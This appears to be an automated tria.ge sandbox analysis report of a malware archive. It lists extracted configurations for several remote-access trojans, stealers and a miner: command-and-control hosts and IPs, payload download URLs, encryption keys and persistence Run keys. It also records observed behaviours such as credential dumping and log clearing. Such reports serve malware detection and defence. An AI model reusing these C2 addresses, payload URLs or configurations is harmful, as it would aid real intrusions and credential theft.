Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
25/01/2025, 23:53
250125-3w9aqawpap 1025/01/2025, 23:45
250125-3r6c9stre1 1025/01/2025, 01:01
250125-bc9zcsypbn 1013/01/2025, 17:50
250113-wewjza1pes 1013/01/2025, 17:32
250113-v4m4fssrgj 10Analysis
-
max time kernel
1200s -
max time network
1197s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
13/01/2025, 17:50
Behavioral task
behavioral1
Sample
New Text Document mod.exe.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe.zip
Resource
win10ltsc2021-20250113-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe.zip
Resource
win11-20241007-en
General
-
Target
New Text Document mod.exe.zip
-
Size
392KB
-
MD5
209c2bed74ce311f3de2c3040f5cbd8b
-
SHA1
676dbe2bbf178ca27210c8a2e37aa9652f4e17d5
-
SHA256
672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6
-
SHA512
44b5207ce1a79c220ed014b7803ba4f3b89b0aa81f2232e152da9e5c8004c164a281d8806843a10590e3c55b902ef5e3f359bc117b80b11d052fe60324709324
-
SSDEEP
6144:PiyQGVN3t3bmwUUoI7a+OjFjjGFEduVVZ4vELL2VzCGb49pRYCEheDmDUKUQWCCJ:P/HfRx7aNFXuhTL2I70SmpXCqry
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
quasar
1.4.1
Office04
other-little.gl.at.ply.gg:11758
0.tcp.in.ngrok.io:14296
fbbc34bd-7320-405e-aebb-d4c666ee475f
-
encryption_key
FEA99DED4EFE826DE2850621FD7919E62525FD26
-
install_name
DirectX111.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
DirectX
-
subdirectory
SubDir
Extracted
redline
1V
195.177.92.88:1912
Extracted
asyncrat
0.5.8
Default
0.tcp.in.ngrok.io:10147
38.240.58.195:6606
Q52IWD1RYgpZ
-
delay
3
-
install
false
-
install_file
Listopener.exe
-
install_folder
%AppData%
Extracted
quasar
1.3.0.0
Office04
20.107.53.25:25535
QSR_MUTEX_zQ0poF2lHhCSZKSUZ3
-
encryption_key
E2xbpJ93MnABcIqioTDL
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
redline
first
212.56.41.77:1912
Extracted
redline
Standoff
89.23.101.77:1912
Extracted
quasar
1.4.1
RuntimeBroker
qrpn9be.localto.net:2810
fc5edab1-6e8f-4963-98aa-bd077e08750f
-
encryption_key
F749DCAC94A1FC3102D2B0CFBBFCB76086F86568
-
install_name
RuntimeBroker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
RuntimeBroker
-
subdirectory
a7
Extracted
quasar
1.3.0.0
sigorta
217.195.197.170:1604
QSR_MUTEX_9WjAcLINYji1uqfzRt
-
encryption_key
B2vTTMiPGqHXv2xzSGYH
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.4.1
ROBLOX EXECUTOR
192.168.50.1:4782
10.0.0.113:4782
LETSQOOO-62766.portmap.host:62766
89.10.178.51:4782
90faf922-159d-4166-b661-4ba16af8650e
-
encryption_key
FFEE70B90F5EBED6085600C989F1D6D56E2DEC26
-
install_name
windows 3543.exe
-
log_directory
roblox executor
-
reconnect_delay
3000
-
startup_key
windows background updater
-
subdirectory
windows updater
Extracted
asyncrat
0.5.7B
Default
wzt5xcg.localto.net:1604
wzt5xcg.localto.net:5274
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
KYGOClient.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Meduza Stealer payload 2 IoCs
resource yara_rule behavioral2/memory/1952-656-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza behavioral2/memory/1952-654-0x0000000000400000-0x0000000000526000-memory.dmp family_meduza -
Meduza family
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" Explorer.EXE -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" Explorer.EXE -
description flow ioc Process 181 api.ipify.org Process not Found 329 api.ipify.org Process not Found Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe 547 ipinfo.io Process not Found 464 ip-api.com Process not Found 180 api.ipify.org Process not Found 543 api.ipify.org Process not Found 513 api.ipify.org Process not Found 514 api.ipify.org Process not Found -
Quasar family
-
Quasar payload 16 IoCs
resource yara_rule behavioral2/files/0x00280000000462af-561.dat family_quasar behavioral2/memory/4992-580-0x0000000000900000-0x0000000000C24000-memory.dmp family_quasar behavioral2/memory/4656-1422-0x0000000000BF0000-0x0000000000F14000-memory.dmp family_quasar behavioral2/memory/3276-2226-0x0000000000160000-0x0000000000484000-memory.dmp family_quasar behavioral2/files/0x002e000000046323-3036.dat family_quasar behavioral2/memory/4248-3063-0x00000000001B0000-0x00000000004D4000-memory.dmp family_quasar behavioral2/files/0x002e000000046336-3488.dat family_quasar behavioral2/memory/1984-3502-0x0000000000770000-0x00000000007CE000-memory.dmp family_quasar behavioral2/memory/3196-3698-0x0000000000220000-0x0000000000544000-memory.dmp family_quasar behavioral2/memory/2392-3723-0x0000000000010000-0x0000000000334000-memory.dmp family_quasar behavioral2/memory/5988-3745-0x0000000000540000-0x000000000059E000-memory.dmp family_quasar behavioral2/files/0x00280000000463c4-4767.dat family_quasar behavioral2/memory/900-4840-0x0000000000810000-0x0000000000B34000-memory.dmp family_quasar behavioral2/memory/2500-4924-0x0000000000E80000-0x00000000011A4000-memory.dmp family_quasar behavioral2/memory/3196-6622-0x00000000007C0000-0x0000000000AE4000-memory.dmp family_quasar behavioral2/memory/5856-7048-0x0000000000AF0000-0x0000000000E14000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
resource yara_rule behavioral2/files/0x00280000000462b0-590.dat family_redline behavioral2/memory/476-602-0x0000000000D60000-0x0000000000DB2000-memory.dmp family_redline behavioral2/files/0x0030000000046332-3452.dat family_redline behavioral2/files/0x0034000000046300-3568.dat family_redline behavioral2/memory/5548-3588-0x0000000000AA0000-0x0000000000AF2000-memory.dmp family_redline behavioral2/memory/1096-3591-0x0000000000F40000-0x0000000000F92000-memory.dmp family_redline -
Redline family
-
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description pid Process procid_target PID 440 created 3776 440 WerFault.exe 368 PID 5140 created 1044 5140 WerFault.exe 17 PID 4752 created 8 4752 WerFault.exe 385 PID 236 created 3288 236 WerFault.exe 390 -
Suspicious use of NtCreateUserProcessOtherParentProcess 23 IoCs
description pid Process procid_target PID 5844 created 4500 5844 svchost.exe 289 PID 5844 created 3776 5844 svchost.exe 368 PID 5844 created 1044 5844 svchost.exe 17 PID 5844 created 8 5844 svchost.exe 385 PID 5844 created 3440 5844 svchost.exe 269 PID 5844 created 5952 5844 svchost.exe 397 PID 5844 created 5348 5844 svchost.exe 403 PID 5844 created 3288 5844 svchost.exe 390 PID 5844 created 2392 5844 svchost.exe 418 PID 5844 created 568 5844 svchost.exe 502 PID 5844 created 568 5844 svchost.exe 502 PID 5844 created 2256 5844 svchost.exe 452 PID 5844 created 4704 5844 svchost.exe 460 PID 5844 created 3152 5844 svchost.exe 470 PID 5844 created 5756 5844 svchost.exe 494 PID 4452 created 632 4452 powershell.EXE 5 PID 5844 created 5668 5844 svchost.exe 411 PID 5844 created 1424 5844 svchost.exe 741 PID 5844 created 3900 5844 svchost.exe 1185 PID 5844 created 5872 5844 svchost.exe 1179 PID 5844 created 1636 5844 svchost.exe 1169 PID 5844 created 4308 5844 svchost.exe 1623 PID 5844 created 3968 5844 svchost.exe 1882 -
XMRig Miner payload 4 IoCs
resource yara_rule behavioral2/files/0x002d00000004632b-3409.dat family_xmrig behavioral2/files/0x002d00000004632b-3409.dat xmrig behavioral2/files/0x002e000000046326-4993.dat family_xmrig behavioral2/files/0x002e000000046326-4993.dat xmrig -
Xmrig family
-
Xred family
-
Async RAT payload 3 IoCs
resource yara_rule behavioral2/files/0x00360000000462cd-3204.dat family_asyncrat behavioral2/files/0x002a000000046321-3674.dat family_asyncrat behavioral2/files/0x0028000000046424-5202.dat family_asyncrat -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ wudi.exe -
mimikatz is an open source tool to dump credentials on Windows 1 IoCs
resource yara_rule behavioral2/files/0x002900000004632d-3249.dat mimikatz -
Blocklisted process makes network request 1 IoCs
flow pid Process 497 3416 chrtrome22.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1648 powershell.exe 5964 powershell.exe 452 powershell.exe 4888 powershell.exe 4316 powershell.exe 4776 powershell.exe 1192 powershell.exe 4452 powershell.EXE -
Contacts a large (874) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 28 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation ._cache_New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation gem1.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation ._cache_New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation Fixer.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation IMG001.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation Client-built.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation drop1.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation NOTallowedtocrypt.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation ._cache_New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation testingg.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation ._cache_New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation ._cache_New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation gem1.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation IMG001.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation windows 3543.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation New Text Document mod.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation windows 3543.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation 123.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation Client-base.exe Key value queried \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Control Panel\International\Geo\Nation chrtrome22.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cbot.exe cbot.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt Crawl.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Decryptfiles.txt Crawl.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk IMG001.exe -
Executes dropped EXE 64 IoCs
pid Process 5028 New Text Document mod.exe 4480 ._cache_New Text Document mod.exe 32 Synaptics.exe 4992 voidware_loader.exe 3032 New Text Document mod.exe 1124 DirectX111.exe 476 build.exe 1236 ._cache_New Text Document mod.exe 4944 gem2.exe 4752 gem1.exe 2100 gem1.exe 2108 gem1.exe 3004 gem1.exe 1952 gem1.exe 5156 Lightshot.exe 6140 New Text Document mod.exe 5656 ._cache_New Text Document mod.exe 4656 voidware_loader.exe 5152 build.exe 5904 gem2.exe 4380 Lightshot.exe 3408 New Text Document mod.exe 5300 ._cache_New Text Document mod.exe 3276 voidware_loader.exe 5252 gem2.exe 4500 gem1.exe 5896 gem1.exe 2088 New Text Document mod.exe 4892 ._cache_New Text Document mod.exe 3064 Lightshot.exe 5344 New Text Document mod.exe 5468 ._cache_New Text Document mod.exe 4248 Client-base.exe 4656 New Text Document mod.exe 3776 ._cache_New Text Document mod.exe 3984 New Text Document mod.exe 1284 ._cache_New Text Document mod.exe 5080 cbot.exe 1904 Client.exe 2448 svhost.exe 2392 mimikatz.exe 5708 123.exe 4252 ._cache_123.exe 1864 xmrig.exe 3416 chrtrome22.exe 3100 Fixer.exe 1984 Client-built.exe 5548 Steanings.exe 1096 ._cache_Fixer.exe 5728 AsyncClientGK.exe 2252 Client-built.exe 3196 RuntimeBroker.exe 2392 RuntimeBroker.exe 5988 uu.exe 228 Crawl.exe 5860 sela.exe 900 JJSPLOIT.V2.exe 2500 windows 3543.exe 568 albt.exe 1368 xmrig.exe 3052 drop2.exe 2256 01.exe 1876 drop1.exe 5684 drop1.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\Software\Wine wudi.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Admin.evtx svchost.exe -
Loads dropped DLL 64 IoCs
pid Process 32 Synaptics.exe 32 Synaptics.exe 3032 New Text Document mod.exe 3032 New Text Document mod.exe 6140 New Text Document mod.exe 6140 New Text Document mod.exe 3408 New Text Document mod.exe 3408 New Text Document mod.exe 2088 New Text Document mod.exe 2088 New Text Document mod.exe 5344 New Text Document mod.exe 5344 New Text Document mod.exe 32 Synaptics.exe 32 Synaptics.exe 4656 New Text Document mod.exe 4656 New Text Document mod.exe 3984 New Text Document mod.exe 3984 New Text Document mod.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 5444 wudi.exe 304 New Text Document mod.exe 304 New Text Document mod.exe 1484 Kerish_Doctor_2022.tmp 1484 Kerish_Doctor_2022.tmp 1576 Kerish_Doctor_2023.tmp 1576 Kerish_Doctor_2023.tmp 2056 Kerish_Doctor.tmp 2056 Kerish_Doctor.tmp 5040 IMG001.exe 5040 IMG001.exe 5040 IMG001.exe 5328 Kerish_Doctor_Windows_XP.tmp 5328 Kerish_Doctor_Windows_XP.tmp 5216 Kerish_Doctor_Windows.tmp 5216 Kerish_Doctor_Windows.tmp 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe 32 Synaptics.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 15 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 drop1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 drop1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 drop1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 drop1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 drop1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XPSUDTARW = "\"C:\\Users\\Admin\\Desktop\\a\\Crawl.exe\"" Crawl.exe Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft-f4855f59e0 = "C:\\Program Files (x86)\\Microsoft\\Temp\\Microsoft-f4855f59e0.exe" drop2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" IMG001.exe Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" 76y5trfed675ytg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" 76y5trfed675ytg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" New Text Document mod.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" NOTallowedtocrypt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6754ytr756ytr7654yretg8765uyt = "\"C:\\Users\\Admin\\AppData\\Roaming\\kjhgfdc\\76y5trfed675ytg.exe\"" NOTallowedtocrypt.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Crawl.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini Crawl.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Crawl.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini Crawl.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: IMG001.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 21 IoCs
flow ioc 31 drive.google.com 156 raw.githubusercontent.com 362 0.tcp.in.ngrok.io 403 0.tcp.in.ngrok.io 423 drive.google.com 1475 raw.githubusercontent.com 198 raw.githubusercontent.com 254 drive.google.com 425 drive.google.com 461 raw.githubusercontent.com 32 drive.google.com 33 drive.google.com 157 raw.githubusercontent.com 359 raw.githubusercontent.com 1354 raw.githubusercontent.com 214 drive.google.com 215 drive.google.com 242 raw.githubusercontent.com 253 drive.google.com 336 drive.google.com 408 raw.githubusercontent.com -
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 181 api.ipify.org 329 api.ipify.org 464 ip-api.com 513 api.ipify.org 514 api.ipify.org 543 api.ipify.org 547 ipinfo.io 180 api.ipify.org -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum drop2.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 drop2.exe -
Power Settings 1 TTPs 28 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 476 powercfg.exe 4620 powercfg.exe 1348 powercfg.exe 5452 powercfg.exe 3656 powercfg.exe 4960 powercfg.exe 5960 powercfg.exe 1624 powercfg.exe 5292 powercfg.exe 5468 powercfg.exe 5924 powercfg.exe 5216 powercfg.exe 3992 powercfg.exe 5172 powercfg.exe 4132 powercfg.exe 5852 powercfg.exe 1192 powercfg.exe 1252 powercfg.exe 3440 powercfg.exe 4916 powercfg.exe 5948 powercfg.exe 5936 powercfg.exe 3732 powercfg.exe 5712 powercfg.exe 5996 powercfg.exe 5196 powercfg.exe 4376 powercfg.exe 5244 powercfg.exe -
Drops file in System32 directory 38 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe Lightshot.exe File created C:\Windows\SysWOW64\$LMX-f4855f59e0.exe drop2.exe File created C:\Windows\system32\perfh011.dat WMIADAP.EXE File created C:\Windows\system32\PerfStringBackup.TMP WMIADAP.EXE File created C:\Windows\system32\perfc00A.dat WMIADAP.EXE File created C:\Windows\system32\perfh00C.dat WMIADAP.EXE File created C:\Windows\system32\perfh010.dat WMIADAP.EXE File created C:\Windows\system32\a7\RuntimeBroker.exe RuntimeBroker.exe File opened for modification C:\Windows\System32\Tasks\windows background updater svchost.exe File opened for modification C:\Windows\System32\Tasks\System-f4855f59e0 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\perfh00A.dat WMIADAP.EXE File created C:\Windows\system32\perfc00C.dat WMIADAP.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\MRT.exe Lightshot.exe File opened for modification C:\Windows\System32\Tasks\UAC svchost.exe File created C:\Windows\system32\perfc009.dat WMIADAP.EXE File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.h WMIADAP.EXE File created C:\Windows\system32\perfc007.dat WMIADAP.EXE File opened for modification C:\Windows\system32\PerfStringBackup.INI WMIADAP.EXE File opened for modification C:\Windows\system32\MRT.exe Lightshot.exe File opened for modification C:\Windows\system32\a7\RuntimeBroker.exe RuntimeBroker.exe File opened for modification C:\Windows\System32\Tasks\$LMXsvc64 svchost.exe File created C:\Windows\system32\perfh007.dat WMIADAP.EXE File created C:\Windows\System32\System-f4855f59e0.exe drop2.exe 